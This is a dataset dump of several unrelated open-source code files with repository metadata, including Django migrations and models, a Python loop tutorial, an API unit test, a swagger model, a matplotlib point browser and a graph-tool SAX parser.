liquidacion_empleado.nomina_empleado.apropiacion.seguridad_social.pension_empresa, # Aporte pension empresa
liquidacion_empleado.nomina_empleado.apropiacion.aporte_parafiscal.sena, # Aporte SENA
liquidacion_empleado.nomina_empleado.apropiacion.aporte_parafiscal.icbf, # Aporte ICBF
liquidacion_empleado.nomina_empleado.apropiacion.aporte_parafiscal.cajas, # Aporte Cajas de Compensacion
liquidacion_empleado.nomina_empleado.deduccion.salud_empleado, # Aporte salud empleado
liquidacion_empleado.nomina_empleado.deduccion.pension_empleado, # Aporte pension empleado
liquidacion_empleado.nomina_empleado.deduccion.aporte_fondo_solidaridad, # Aporte fondo de solidaridad
liquidacion_empleado.salario_neto, # Salario neto para el empleado
liquidacion_empleado.costo_empresa # Costo total para la empresa
)
formato_linea = "Id: %d " \
"Nombre: %s " \
"Cargo: %s " \
"Salario base: %.2f " \
"Auxilio de Transporte: %.2f " \
"Apropiaciones -> " \
"Prestaciones Sociales - " \
"Cesantias: %.2f " \
"Intereses sobre cesantias: %.2f " \
"Prima: %.2f " \
"Vacaciones: %.2f " \
"Seguridad Social - " \
"ARL: %.2f " \
"Salud empresa: %.2f " \
"Pension empresa: %.2f " \
"Parafiscales - " \
"SENA: %.2f " \
"ICBF: %.2f " \
"Cajas: %.2f " \
"Deducciones -> " \
"Salud empleado: %.2f " \
"Pension empleado: %.2f " \
"Fondo de solidaridad: %.2f " \
"-- Salario neto empleado --> : %.2f " \
"-- Costo total empresa --> : %.2f " \
"\n"
self.log_utils.escribir_linea_archivo(nombre_archivo_liquidacion, formato_linea % contenido_linea)
self.log_utils.guardar_log("Liquidacion guardada...") | [
"tdp201503@gmail.com"
] | tdp201503@gmail.com |
cb4d004c16b1c2d9d572c6366e253777db1067fb | 7a0d58b578c8346f45cecbac2fb26d44c20b499f | /BrubotServer/Interface/migrations/0003_auto_20181004_1127.py | 83a37ef26beab722e543a46311080b081964c9d3 | [] | no_license | bro-wer/brubot_server | e8d843cb27aa8b12d780038ccdd643721e7e5b19 | d203145836cc87568cc1b4ba6b6cdc04cc653229 | refs/heads/master | 2020-03-30T20:07:30.600144 | 2018-10-08T10:56:18 | 2018-10-08T10:56:18 | 151,574,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 556 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-10-04 09:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter Task.status so its default is a valid stored choice key.

    The generated version used default='Not Started' -- the human-readable
    *label*, which is not one of the stored keys and is longer than
    max_length=5, so saving a Task without an explicit status would store
    an invalid (or truncated) value.  The stored key for "Not Started"
    is 'NS'.
    NOTE(review): Interface/models.py must declare the same default ('NS'),
    otherwise `makemigrations` will detect a model/migration difference.
    """

    dependencies = [
        ('Interface', '0002_task_status'),
    ]

    operations = [
        migrations.AlterField(
            model_name='task',
            name='status',
            # choices map 2-letter stored keys -> display labels; the
            # default must be a key ('NS'), not a label ('Not Started').
            field=models.CharField(choices=[('NS', 'Not Started'), ('ST', 'Started'), ('FI', 'Finished'), ('ER', 'Error')], default='NS', max_length=5),
        ),
    ]
| [
"bronislaw.werla@gft.com"
] | bronislaw.werla@gft.com |
c27aad2901a9f0422a24a7ad7838f5d4c3a0c1e5 | 24180ecc26262c952cdf9da0ba062bfb1d3f5126 | /04/02.for.py | 9338b08c8ff50897a40e6368e60ccf8b89b95123 | [] | no_license | whwndgus001/python-basics | d3d380268994c1ec2de93c1734db480116331485 | b92e167261c876e762127bc60bd40071257c1d0f | refs/heads/master | 2022-12-26T03:04:16.218402 | 2020-10-05T06:48:11 | 2020-10-05T06:48:11 | 290,401,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,426 | py | # for 반복문
# "for" loop practice: for <name> in <sequence object>:
for number in [10, 20, 30, 40]:
    result = number ** 2
    print(result, '----', end=' ')
else:
    print('')
a = ['cat', 'cow', 'tiger']
for animal in a:
    print(animal, end=' ')
else:
    print('')
# Unpacking a compound (tuple) element inside a for loop.
pairs = [('둘리', 10), ('마이콜', 30), ('또치', 11)]
for t in pairs:
    print('이름: %s, 나이:%d' % t)
# A loop that runs 10 times.
for i in range(1, 11):
    print(i, end=' ')
else:
    print('\n---------------------')
# Sum of 1..10 (named `total` so the builtin `sum` is not shadowed).
total = 0
for i in range(1, 11):
    total = total + i
print(total)
# break: the for-else clause is skipped when the loop breaks.
for n in range(10):
    if n > 5:
        break
    print(n, end=' ')
else:
    print('\n-------------')
print("\n-------------------")
# continue: the for-else clause runs because the loop completes.
for n in range(10):
    if n <= 5:
        continue
    print(n, end=' ')
else:
    print('\n-------구구단 1-----')
# Multiplication table, version 1: one product per line.
for i in range(1, 10):
    for j in range(1, 10):
        print("%d x %d = %d" % (i, j, i * j))
print("\n-----------구구단 2----------")
# Multiplication table, version 2: one row per line, tab-separated.
for i in range(1, 10):
    for j in range(1, 10):
        print("{0} x {1} = {2}".format(j, i, j * i), end='\t')
    else:
        print('')
print('\n-----------삼각형-----------')
# Triangle 1: row i prints i+1 stars.
for i in range(10):
    for j in range(0, i + 1):
        print('*', end='')
    else:
        print('')
print('\n--------삼각형2-------------')
# Triangle 2: shrinking rows of stars.
for i in range(10, 0, -1):
    print('*' * i)
"whwndgus0000@naver.com"
] | whwndgus0000@naver.com |
a52dfaac37bcd5fa128652b84d5b4b9904f40414 | 1974b3e9c5f2f677833e1608a41281f377fd331c | /dltesthttp_xuyalin2/www/testcase/dlmall/ts_couponx/getUseFulCoupons.py | e7f7c5c587deb28ea48f702a15f9161b6113a024 | [] | no_license | xyl00755/pythonLearning | ed0f540b61247c3560f347853da5886b2e2ba25d | c6aecff86ff34dcd7358d98201627ff84e9bf2cf | refs/heads/master | 2021-01-13T08:19:25.171016 | 2016-12-16T05:43:10 | 2016-12-16T05:43:10 | 71,764,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,696 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
from www.api.dlmall import *
from www.common.excel import *
from www.common.database import *
"""
/couponx/getUseFulCoupons.html
request:
get
http://123.57.244.205:9003/couponx/getUseFulCoupons.html?goodsId=f4bccbbd84e44f9ba839e082970dccca%2C9c02bcf9737d499a8a72a3514730b425%2C24df3ab5b628496aa0fdded6c4230fec%2C2e78061ea75b26638ef38d1b0c848cbb%2Cbc54482ad9a44f3d95b63d9876bc3100%2C&t=1474440394741
response:json string
{
"status": 0,
"data": {
"unUseFulCoupons": [
{
"id": null,
"couponEntityId": "114512879800028",
"couponName": "6元优惠券验证",
"couponAmt": 600,
"couponEntityStatus": "01",
"effectiveTime": "2016-09-21",
"uneffectiveTime": "2016-10-21",
"category": "白酒",
"expireTime": null,
"useTime": null,
"records": null
}
],
"useFulCoupons": [
{
"id": null,
"couponEntityId": "114512879800028",
"couponName": "6元优惠券验证",
"couponAmt": 600,
"couponEntityStatus": "01",
"effectiveTime": "2016-09-21",
"uneffectiveTime": "2016-10-21",
"category": "白酒",
"expireTime": null,
"useTime": null,
"records": null
}
]
},
"msg": ""
}
"""
class getUseFulCoupons(unittest.TestCase):
    """Tests for /couponx/getUseFulCoupons.html (sample payload in the
    module docstring)."""

    # Shared fixtures: spreadsheet-driven test data and a logged-in buyer
    # session (created once at class-definition time).
    UserShop = eData('WebManager')
    danluCouponsInfo = eData('DanluCoupons')
    dlservice = dlmall()
    s = dlservice.login(UserShop.buyer_username, UserShop.buyer_password)

    def test_Coupons_sort(self):
        """Four coupons: #1 expires last, #2/#3 share an expiry date with
        different amounts, #4 expires first.  The response must list the
        usable coupons soonest-expiring first: 4, 3, 2, 1."""
        # Fixed: the original referenced `self.danluConponsInfo` (typo),
        # which would raise AttributeError at runtime.
        data = [self.danluCouponsInfo.goodsId1,
                self.danluCouponsInfo.goodsId2,
                self.danluCouponsInfo.goodsId3,
                self.danluCouponsInfo.goodsId4]
        # The endpoint takes the goods ids as one comma-separated string
        # (the original built the joined string but discarded the result).
        # NOTE(review): confirm the API helper expects the joined string
        # rather than the raw list.
        goods_ids = ','.join(data)
        # Fixed: bare `s` was a NameError inside the method body; class
        # attributes must be reached through `self`.
        couponlist = self.dlservice.getUseFulCoupons(self.s, goods_ids)
        # Response key is 'useFulCoupons' (lowercase 'u'), per the sample
        # response in the module docstring.
        coupons = couponlist['data']['useFulCoupons']
        self.assertEqual(coupons[0]['couponEntityId'], self.danluCouponsInfo.couponEntityId4)
        self.assertEqual(coupons[1]['couponEntityId'], self.danluCouponsInfo.couponEntityId3)
        self.assertEqual(coupons[2]['couponEntityId'], self.danluCouponsInfo.couponEntityId2)
        self.assertEqual(coupons[3]['couponEntityId'], self.danluCouponsInfo.couponEntityId1)
| [
"xuyalin@danlu.com"
] | xuyalin@danlu.com |
54a7a9643b787b5bc24f6ee402a26926bdf4aa36 | d34db2a5d96cd155f9e6fef1db0ac697c28ee527 | /ToDo_App/my_app/todo_list/migrations/0001_initial.py | 4431d1886c465192e8aec5f39177ef42fd74f2a5 | [] | no_license | sinyinglee/Pyclass-2019- | 5e69d56009543353db0f9deb576a17e1f4ca23df | c48c42f68512da6457c2453fd2ce0e15a063bf83 | refs/heads/master | 2020-08-04T19:00:08.331930 | 2020-04-28T15:54:03 | 2020-04-28T15:54:03 | 212,241,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 551 | py | # Generated by Django 3.0.1 on 2019-12-22 05:20
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema for the todo_list app: creates the ``List`` table."""

    initial = True

    dependencies = []

    operations = [
        migrations.CreateModel(
            name='List',
            fields=[
                # Standard auto-incrementing surrogate primary key.
                ('id', models.AutoField(auto_created=True, primary_key=True,
                                        serialize=False, verbose_name='ID')),
                # The to-do text itself.
                ('item', models.CharField(max_length=200)),
                # Whether the item has been ticked off; new items start open.
                ('completed', models.BooleanField(default=False)),
            ],
        ),
    ]
| [
"mandylee@Mandyde-MacBook-Pro.local"
] | mandylee@Mandyde-MacBook-Pro.local |
d9147f28893fa78f78452ad48057faef6031d89a | fe21de00c15c174a2052cd601399ccb25a8e89dd | /digitick_client/models/shows_response_inner.py | d4f574e1311d165723db3269a3ea8105408e5195 | [
"MIT"
] | permissive | frague59/digitick-client | 560f775c7731ed7eda1f20137a7c2f8f67c7761d | b8787438cddc60720c60c8b23826185a7d0988d5 | refs/heads/master | 2021-09-05T01:49:18.131356 | 2018-01-23T15:23:27 | 2018-01-23T15:23:27 | 114,750,554 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,509 | py | # coding: utf-8
"""
Digitick REST API
The Digitick REST API is a set of methods giving access to catalog, user and cart management.
OpenAPI spec version: v1.0
Contact: contact@digitick.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
def _attach_swagger_properties(cls):
    """Class decorator: attach one read/write property per attribute listed
    in ``cls.swagger_types``.

    Every accessor in the generated code was identical (get/set on the
    ``_name`` backing slot), so instead of ~20 hand-written property pairs
    they are generated in a loop.  The default arguments bind ``_slot`` at
    definition time, avoiding the late-binding closure pitfall.
    """
    for _name in cls.swagger_types:
        def _get(self, _slot='_' + _name):
            return getattr(self, _slot)

        def _set(self, value, _slot='_' + _name):
            setattr(self, _slot, value)

        setattr(cls, _name,
                property(_get, _set,
                         doc="The %s of this %s." % (_name, cls.__name__)))
    return cls


@_attach_swagger_properties
class ShowsResponseInner(object):
    """Swagger model for one show of a Digitick event.

    NOTE: originally generated by the swagger code generator; this version
    preserves the generated public interface (``swagger_types``,
    ``attribute_map``, the keyword-only-style constructor, one property per
    attribute, and ``to_dict``/``to_str``/``__repr__``/``__eq__``/``__ne__``)
    while removing the duplicated accessor boilerplate.

    Attributes:
        swagger_types (dict): attribute name -> attribute type.
        attribute_map (dict): attribute name -> JSON key in the API payload.
    """

    swagger_types = {
        'id': 'int',
        'start': 'str',
        'end': 'str',
        'venue': 'str',
        'address': 'str',
        'zip_code': 'str',
        'city': 'str',
        'country_id': 'int',
        'number_of_prices': 'int',
        'min_price_cents': 'int',
        'max_price_cents': 'int',
        'reserved_seats': 'bool',
        'plan_url': 'str',
        'plan_last_change': 'str',
        'status': 'int',
        'sales_start': 'str',
        'sales_end': 'str',
        'is_exclu': 'bool'
    }

    attribute_map = {
        'id': 'id',
        'start': 'start',
        'end': 'end',
        'venue': 'venue',
        'address': 'address',
        'zip_code': 'zipCode',
        'city': 'city',
        'country_id': 'countryId',
        'number_of_prices': 'numberOfPrices',
        'min_price_cents': 'minPriceCents',
        'max_price_cents': 'maxPriceCents',
        'reserved_seats': 'reservedSeats',
        'plan_url': 'planUrl',
        'plan_last_change': 'planLastChange',
        'status': 'status',
        'sales_start': 'salesStart',
        'sales_end': 'salesEnd',
        'is_exclu': 'isExclu'
    }

    def __init__(self, id=None, start=None, end=None, venue=None, address=None, zip_code=None, city=None, country_id=None, number_of_prices=None, min_price_cents=None, max_price_cents=None, reserved_seats=None, plan_url=None, plan_last_change=None, status=None, sales_start=None, sales_end=None, is_exclu=None):
        """ShowsResponseInner - a model defined in Swagger.

        Every attribute defaults to None; non-None arguments are assigned
        through the generated property setters, mirroring the behaviour of
        the generated code.
        """
        given = locals()
        for name in self.swagger_types:
            # The backing slot always exists, even for omitted arguments,
            # so __dict__-based equality keeps working.
            setattr(self, '_' + name, None)
            if given[name] is not None:
                setattr(self, name, given[name])

    def to_dict(self):
        """Return the model's properties as a dict, recursing into nested
        models, lists and dicts (anything exposing ``to_dict``)."""
        result = {}
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [item.to_dict() if hasattr(item, 'to_dict') else item
                                for item in value]
            elif hasattr(value, 'to_dict'):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {k: (v.to_dict() if hasattr(v, 'to_dict') else v)
                                for k, v in value.items()}
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Return the pretty-printed string representation of the model."""
        return pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """True when *other* is a ShowsResponseInner with equal attributes."""
        if not isinstance(other, ShowsResponseInner):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Inverse of __eq__ (kept for Python 2 compatibility)."""
        return not self == other
| [
"fguerin@ville-tourcoing.fr"
] | fguerin@ville-tourcoing.fr |
b9bcf064e318743a5c5030ddf2e243fa9c742794 | 8537ecfe2a23cfee7c9f86e2318501f745078d67 | /Practise_stuff/matplotlib/click_on_point_to_see_timeseries.py | d68c313bc04fa4ac8a3c2008391627668a605bd3 | [] | no_license | oolsson/oo_eclipse | 91d33501d9ed6c6b3c51bb22b635eb75da88e4e1 | 1828866bc4e1f67b279c5a037e4a6a4439ddb090 | refs/heads/master | 2021-01-01T20:17:12.644890 | 2015-11-30T09:49:41 | 2015-11-30T09:49:41 | 23,485,434 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,316 | py | import numpy as np
class PointBrowser:
    """
    Interactive browser for the scatter plot in ``ax``.

    Clicking a point selects it (yellow halo) and plots the series that
    produced it in the lower axes; the 'n' and 'p' keys step to the next /
    previous point.  Relies on the module-level names created in the
    __main__ block: xs, ys, X, line, ax, ax2 and fig.
    """

    def __init__(self):
        self.lastind = 0
        # On-figure status label anchored to the top-left of `ax`.
        self.text = ax.text(0.05, 0.95, 'selected: none',
                            transform=ax.transAxes, va='top')
        # Yellow marker drawn over the currently selected point.
        self.selected, = ax.plot([xs[0]], [ys[0]], 'o', ms=12, alpha=0.4,
                                 color='yellow', visible=False)

    def onpress(self, event):
        """Key handler: 'n' advances the selection, 'p' steps back."""
        if self.lastind is None:
            return
        if event.key not in ('n', 'p'):
            return
        step = 1 if event.key == 'n' else -1
        # Clamp so browsing never walks off either end of the data.
        self.lastind = np.clip(self.lastind + step, 0, len(xs) - 1)
        self.update()

    def onpick(self, event):
        """Pick handler: select the picked point nearest the click."""
        if event.artist != line:
            return True
        if not len(event.ind):
            return True
        # Distance from the click location to every picked candidate.
        click_x = event.mouseevent.xdata
        click_y = event.mouseevent.ydata
        distances = np.hypot(click_x - xs[event.ind], click_y - ys[event.ind])
        self.lastind = event.ind[distances.argmin()]
        self.update()

    def update(self):
        """Redraw the detail axes and selection marker for ``lastind``."""
        if self.lastind is None:
            return
        dataind = self.lastind
        ax2.cla()
        ax2.plot(X[dataind])
        ax2.text(0.05, 0.9, 'mu=%1.3f\nsigma=%1.3f' % (xs[dataind], ys[dataind]),
                 transform=ax2.transAxes, va='top')
        ax2.set_ylim(-0.5, 1.5)
        self.selected.set_visible(True)
        self.selected.set_data(xs[dataind], ys[dataind])
        self.text.set_text('selected: %d' % dataind)
        fig.canvas.draw()
if __name__ == '__main__':
    import matplotlib.pyplot as plt
    # 100 random series of length 200; each scatter point below is the
    # (mean, std) of one series.
    X = np.random.rand(100, 200)
    xs = np.mean(X, axis=1)
    ys = np.std(X, axis=1)
    fig, (ax, ax2) = plt.subplots(2, 1)
    ax.set_title('click on point to plot time series')
    # picker=5: a click within 5 points of a marker fires a pick_event.
    line, = ax.plot(xs, ys, 'o', picker=5)  # 5 points tolerance
    browser = PointBrowser()
    # Route figure events to the browser instance.
    fig.canvas.mpl_connect('pick_event', browser.onpick)
    fig.canvas.mpl_connect('key_press_event', browser.onpress)
    plt.show()
| [
"o.h.olsson@gmail.com"
] | o.h.olsson@gmail.com |
92e7687c7a8ef96851e81777f69514357f9cb034 | 020b0d5029a2095118356290046c71206bb24721 | /shipping/models.py | 64b05cad347435fa4bfebff6a138d095e02da066 | [] | no_license | H1tman1978/DjangoShippingApp | 5e59f0882f4a3af63456bee23a933335a926559d | 530db4a4d2e9f92c41795b3e989301a742c49a99 | refs/heads/master | 2023-01-23T18:49:11.231553 | 2020-11-13T21:51:00 | 2020-11-13T21:51:00 | 311,332,824 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,000 | py | from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
# Create your models here.
class Address(models.Model):
    """A US/Canadian mailing address, optionally saved under a nickname.

    Used as both the origin and the destination of a Shipment.
    NOTE(review): the optional CharFields use null=True, which gives two
    distinct "empty" states ('' and NULL) -- the usual Django convention is
    blank=True only.  Changing it would require a data migration, so it is
    only flagged here.
    """

    # (stored 2-letter code, display label) pairs for the `state` field.
    STATE_PROVINCE_CHOICES = [
        # US States
        ('AL', 'Alabama - AL'),
        ('AK', 'Alaska - AK'),
        ('AZ', 'Arizona - AZ'),
        ('AR', 'Arkansas - AR'),
        ('CA', 'California - CA'),
        ('CO', 'Colorado - CO'),
        ('CT', 'Connecticut - CT'),
        ('DE', 'Delaware - DE'),
        ('FL', 'Florida - FL'),
        ('GA', 'Georgia - GA'),
        ('HI', 'Hawaii - HI'),
        ('ID', 'Idaho - ID'),
        ('IL', 'Illinois - IL'),
        ('IN', 'Indiana - IN'),
        ('IA', 'Iowa - IA'),
        ('KS', 'Kansas - KS'),
        ('KY', 'Kentucky - KY'),
        ('LA', 'Louisiana - LA'),
        ('ME', 'Maine - ME'),
        ('MD', 'Maryland - MD'),
        ('MA', 'Massachusetts - MA'),
        ('MI', 'Michigan - MI'),
        ('MN', 'Minnesota - MN'),
        ('MS', 'Mississippi - MS'),
        ('MO', 'Missouri - MO'),
        ('MT', 'Montana - MT'),
        ('NE', 'Nebraska - NE'),
        ('NV', 'Nevada - NV'),
        ('NH', 'New Hampshire - NH'),
        ('NJ', 'New Jersey - NJ'),
        ('NM', 'New Mexico - NM'),
        ('NY', 'New York - NY'),
        ('NC', 'North Carolina - NC'),
        ('ND', 'North Dakota - ND'),
        ('OH', 'Ohio - OH'),
        ('OK', 'Oklahoma - OK'),
        ('OR', 'Oregon - OR'),
        ('PA', 'Pennsylvania - PA'),
        ('RI', 'Rhode Island - RI'),
        ('SC', 'South Carolina - SC'),
        ('SD', 'South Dakota - SD'),
        ('TN', 'Tennessee - TN'),
        ('TX', 'Texas - TX'),
        ('UT', 'Utah - UT'),
        ('VT', 'Vermont - VT'),
        ('VA', 'Virginia - VA'),
        ('WA', 'Washington - WA'),
        ('WV', 'West Virginia - WV'),
        ('WI', 'Wisconsin - WI'),
        ('WY', 'Wyoming - WY'),
        # US Commonwealth and Territories
        ('AS', 'American Samoa - AS'),
        ('DC', 'District of Columbia - DC'),
        ('FM', 'Federated States of Micronesia - FM'),
        ('GU', 'Guam - GU'),
        # Fixed label: was 'Marshall Islands = MH', inconsistent with the
        # ' - ' separator used by every other entry.  (Label-only change,
        # but Django will still detect it and generate an AlterField
        # migration.)
        ('MH', 'Marshall Islands - MH'),
        ('MP', 'Northern Mariana Islands - MP'),
        ('PW', 'Palau - PW'),
        ('PR', 'Puerto Rico - PR'),
        ('VI', 'US Virgin Islands - VI'),
        # Canadian Provinces and Territories
        ('AB', 'Alberta - AB'),
        ('BC', 'British Columbia - BC'),
        ('MB', 'Manitoba - MB'),
        ('NB', 'New Brunswick - NB'),
        ('NL', 'Newfoundland - NL'),
        ('NS', 'Nova Scotia - NS'),
        ('NT', 'Northwest Territories - NT'),
        ('NU', 'Nunavut - NU'),
        ('ON', 'Ontario - ON'),
        ('PE', 'Prince Edward Island - PE'),
        ('QC', 'Quebec - QC'),
        ('SK', 'Saskatchewan - SK'),
        ('YT', 'Yukon - YT'),
    ]

    # Optional addressee / company lines.
    attention_to = models.CharField(max_length=50, blank=True, null=True)
    company_name = models.CharField(max_length=50, blank=True, null=True)
    address1 = models.CharField(max_length=50, blank=False)
    address2 = models.CharField(max_length=50, blank=True, null=True)
    city = models.CharField(max_length=25, blank=False, default="Austin")
    state = models.CharField(max_length=2, choices=STATE_PROVINCE_CHOICES, default="TX", blank=False)
    postal_code = models.CharField(max_length=10, default="78758", blank=True, null=True)
    # User-chosen nickname for this address; used as the display name.
    saved_name = models.CharField(max_length=30, blank=True, null=True)
    created_by = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True)

    def __str__(self):
        """Addresses are listed by their user-chosen nickname."""
        return f"{self.saved_name}"
class Shipment(models.Model):
    """A shipment: one origin/destination Address pair plus handling flags.

    Packages belong to a Shipment via Package.shipment_id.
    """
    # Both ends are Address rows; distinct related_names keep the two
    # reverse relations from Address apart.
    originating_address = models.ForeignKey(Address, on_delete=models.CASCADE, related_name='originating_addresses')
    ship_to_address = models.ForeignKey(Address, on_delete=models.CASCADE, related_name='ship_to_addresses')
    # Hazard/handling flags for the shipment as a whole.
    has_chemicals = models.BooleanField(default=False)
    has_batteries = models.BooleanField(default=False)
    is_magnetized = models.BooleanField(default=False)
    instruction_number = models.CharField(max_length=15, unique=True, blank=False) # Refers to Shipment Instruction Number
    has_shipped = models.BooleanField(default=False)
    def __str__(self):
        """Identify the shipment by its unique instruction number."""
        return f"{self.instruction_number}"
class Package(models.Model):
    """One physical unit (box/case/crate/drum/pallet) within a Shipment."""
    # Stored 2-letter code -> human-readable packaging type.
    UNIT_TYPES = [
        ('BO', 'Box'),
        ('CS', 'Case'),
        ('CR', 'Crate'),
        ('DR', 'Drum'),
        ('PL', 'Pallet'),
    ]
    case_number = models.CharField(max_length=10, unique=True)
    # NOTE(review): the field name `type` shadows the builtin inside the
    # class body; renaming it would require a schema migration, so it is
    # only flagged here.
    type = models.CharField(max_length=2, choices=UNIT_TYPES, default='BO')
    # Dimensions and weight; units are not recorded in the model.
    # NOTE(review): presumably inches and pounds -- confirm with callers.
    length = models.IntegerField(blank=False, default=12)
    width = models.IntegerField(blank=False, default=12)
    height = models.IntegerField(blank=False, default=12)
    weight = models.IntegerField(blank=False, default=10)
    tracking_number = models.CharField(max_length=25, unique=True)
    carrier = models.CharField(max_length=50, default='UPS')
    shipment_id = models.ForeignKey(Shipment, on_delete=models.CASCADE)
    # timezone.now is passed as a callable, so it is evaluated per-row at
    # save time, not once at import time.
    date_shipped = models.DateTimeField(default=timezone.now, blank=True, null=True)
    def __str__(self):
        """Identify the package by its unique case number."""
        return f"{self.case_number}"
class Part(models.Model):
    """Model for Parts"""
    # A line item: `quantity` copies of `part_number` packed in `package_id`.
    part_number = models.CharField(max_length=15, blank=False)
    quantity = models.IntegerField(blank=False)
    description = models.CharField(max_length=50, blank=False)
    package_id = models.ForeignKey(Package, on_delete=models.CASCADE)
    def __str__(self):
        """E.g. "3 x AB-123 - Widget bracket"."""
        return f"{self.quantity} x {self.part_number} - {self.description}"
class Machine(models.Model):
    """A serialized machine packed inside a Package."""
    machine_type = models.CharField(max_length=5, blank=True, null=True)
    model = models.CharField(max_length=15, blank=False)
    serial_number = models.CharField(max_length=50, blank=False)
    description = models.CharField(max_length=50, blank=False)
    package_id = models.ForeignKey(Package, on_delete=models.CASCADE)
    def __str__(self):
        """E.g. "CNC-X200: SN12345"."""
        return f"{self.machine_type}-{self.model}: {self.serial_number}"
| [
"anthonyrolfe1@outlook.com"
] | anthonyrolfe1@outlook.com |
25776af1187fca771865fe9e88c12c22d85a6df2 | d0e4eb61112f7ea62ed0d982dcd5937d5439c67c | /posts-network-graphtool.py | c70e075ad9ec61ec71aa7d77520f9a05cb56630e | [] | no_license | issaCucumber/network_graphs | 4d8ec5c6b9f37bc30956f8d4ca85f2c5b88ba7bb | 715e2b556ade5410576c972a0b0df5a3a7e58662 | refs/heads/master | 2020-04-06T06:59:38.282990 | 2016-09-11T08:37:37 | 2016-09-11T08:37:37 | 64,069,696 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,805 | py | #!/usr/bin/python
import xml.sax
import unicodedata
import os
import size
import color
import re
from graph_tool.all import *
from numpy import integer
# Map from post-id string -> graph_tool vertex, shared with the SAX handler.
vertices = {}
g = Graph(directed=False)
# Per-vertex display properties, filled in as posts are parsed.
v_color = g.new_vertex_property("int")
v_size = g.new_vertex_property("int")
v_pen_width = g.new_vertex_property("int")
# Matches a reaction count such as "12" or "12k".
regex = re.compile(r"[0-9]+k*")
#Post Handler
class PostHandler(xml.sax.ContentHandler):
    """SAX handler that builds the discussion graph.

    Every <post> element becomes a vertex attached either to the topic
    root ("human_rights") or to the post it replies to.  Vertex colour and
    size encode the comment nesting depth, and the text of a <reaction>
    element sets the pen width of the current post's vertex.
    """

    def __init__(self):
        self.dataStruct = []
        # Nesting depth inside <comments> elements (0 = top level).
        self.commentLevel = 0
        # Name of the XML element currently being parsed.
        self.currentData = ""
        # Vertex of the most recently opened <post>; characters() uses it
        # to attach the reaction-based pen width.
        self.currentPostVertexId = 0

    def startElement(self, name, attrs):
        global vertices
        self.currentData = name
        if name == "post":
            replyto = unicodedata.normalize('NFKD', attrs.getValue("replyto")).encode('ascii', 'ignore')
            id = unicodedata.normalize('NFKD', attrs.getValue("id")).encode('ascii', 'ignore')
            # Ensure the post has a vertex and always record it as the
            # current post.  (The original recorded it only when the vertex
            # was newly created, and let a newly created *parent* vertex
            # overwrite it, so reactions could be attached to the parent.)
            if id not in vertices:
                vertices[id] = g.add_vertex()
            self.currentPostVertexId = vertices[id]
            if replyto == "null":
                # Top-level post: hang it off the topic root vertex.
                g.add_edge(vertices["human_rights"], vertices[id])
                v_color[vertices[id]] = color.LEVEL_1
                v_size[vertices[id]] = size.ROOT - 10
            else:
                # Reply: link to the parent post, creating the parent's
                # vertex if it has not been parsed yet.  (The original also
                # created a spurious vertex for the literal id "null".)
                if replyto not in vertices:
                    vertices[replyto] = g.add_vertex()
                g.add_edge(vertices[replyto], vertices[id])
                v_color[vertices[id]] = color.LEVEL_1 + self.commentLevel
                v_size[vertices[id]] = size.ROOT - 10 * (1 + self.commentLevel)
        if name == "comments":
            self.commentLevel += 1

    def endElement(self, name):
        # Leaving a <comments> element moves one nesting level up.
        if name == "comments":
            self.commentLevel -= 1

    def characters(self, content):
        # Only the text of <reaction> matters: a count such as "523" or "12k".
        if self.currentData == "reaction":
            text = unicodedata.normalize('NFKD', content).encode('ascii', 'ignore')
            matches = regex.match(text)
            if matches:
                match = matches.group(0)
                digits = match.split('k')[0]
                # A trailing 'k' means thousands.  (The original decided
                # by len(digits) == 2 and converted only digits[0], so
                # e.g. "12k" became 1000 and "34" became 3000.)
                if 'k' in match:
                    reaction = int(digits) * 1000
                else:
                    reaction = int(digits)
            else:
                reaction = 0
            # Pen width scales with popularity; the floor keeps posts with
            # no reactions visible.
            if reaction == 0:
                v_pen_width[self.currentPostVertexId] = 0.5
            else:
                v_pen_width[self.currentPostVertexId] = reaction * 0.01
#add the root vertex to the graph (topic)
vertices["human_rights"] = g.add_vertex()
v_color[vertices["human_rights"]] = color.ROOT
v_size[vertices["human_rights"]] = size.ROOT
v_pen_width[vertices["human_rights"]] = 1.2
#create reader
parser = xml.sax.make_parser()
# Disable namespace processing; the input files use plain element names.
parser.setFeature(xml.sax.handler.feature_namespaces, 0)
# override the default ContextHandler
Handler = PostHandler()
parser.setContentHandler( Handler )
# Parse every file under data/; the handler accumulates all of them into
# the single global graph `g`.
dirname = "data/"
for f in os.listdir(dirname):
    xmlfile = os.path.join(dirname, f)
    if os.path.isfile(xmlfile):
        parser.parse(xmlfile)
# Register the display properties on the graph, lay it out and render it.
g.vertex_properties["color"] = v_color
g.vertex_properties["size"] = v_size
g.vertex_properties["pen_width"] = v_pen_width
pos = sfdp_layout(g)
graph_draw(g, pos,
           vertex_fill_color=v_color,
           vertex_font_size=10,
           vertex_size=v_size,
           vertex_pen_width = v_pen_width,
           edge_pen_width=1.2,
           output_size=(1000, 1000))
| [
"chrisyzlui@gmail.com"
] | chrisyzlui@gmail.com |
